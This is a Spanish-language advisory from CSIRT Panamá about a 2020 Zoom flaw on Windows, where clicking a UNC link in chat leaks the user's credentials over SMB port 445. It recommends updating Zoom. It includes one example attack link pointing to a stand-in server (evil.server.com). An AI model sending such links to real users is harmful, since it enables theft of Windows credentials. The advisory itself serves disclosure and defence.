CSIRT Panamá Aviso 2020-04-07 Robo de credenciales de Windows desde Zoom
Gravedad: Alta
Fecha de publicación: abril 7, 2020
Última revisión: abril 7, 2020
Sistemas Afectados:
Zoom versiones anteriores a 4.6.9
I. Descripción
El software Zoom ampliamente utilizado tiene una vulnerabilidad que permite a los atacantes robar las credenciales de su sistema operativo.
El descubrimiento de esta vulnerabilidad se produce cuando el uso de Zoom se ha incrementado a raíz de la pandemia de COVID-19.
Con un gran número de personas que trabajan desde casa, confían en Zoom para conectarse con compañeros de trabajo, clientes y socios.
Muchos de estos usuarios domésticos se están conectando a redes de trabajo sensibles a través de medios temporales que no tienen el beneficio de los firewalls de nivel empresarial que se encuentran en las instalaciones.
II. Problemas Conocidos
Si bien el ataque solo funciona contra usuarios de Windows, los ataques pueden iniciarse enviando a los objetivos una ubicación UNC en un mensaje de texto. Ejemplo: \\evil.server.com\images\cat.jpg.
Cuando los usuarios de Windows hacen clic en el enlace mientras están conectados a ciertas máquinas o redes no seguras, la aplicación Zoom enviará las credenciales a través del puerto 445, que se utiliza para transmitir el tráfico relacionado con los servicios de Windows SMB
y Active Directory.
En el caso de que el puerto 445 esté cerrado a Internet, ya sea por un dispositivo o firewall de red o por un ISP que lo bloquea, el ataque no funcionará.
Producto de COVID-19, millones de personas están trabajando desde casa sin los mismos niveles de soporte de TI y seguridad que obtienen cuando trabajan en sus empresas.
III. Referencia a soluciones, herramientas e información
Actualizar a la ultima versión de Zoom:
https://zoom.us/client/latest/ZoomInstaller.exe
IV. Información de contacto
CSIRT PANAMA
Computer Security Incident Response Team Autoridad Nacional para la Innovacion Gubernamental
E-Mail: info@cert.pa
Phone: +507 520-CERT (2378)
Web: https://cert.pa
Twitter: @CSIRTPanama
Facebook: http://www.facebook.com/CSIRTPanama
Key ID: 16F2B124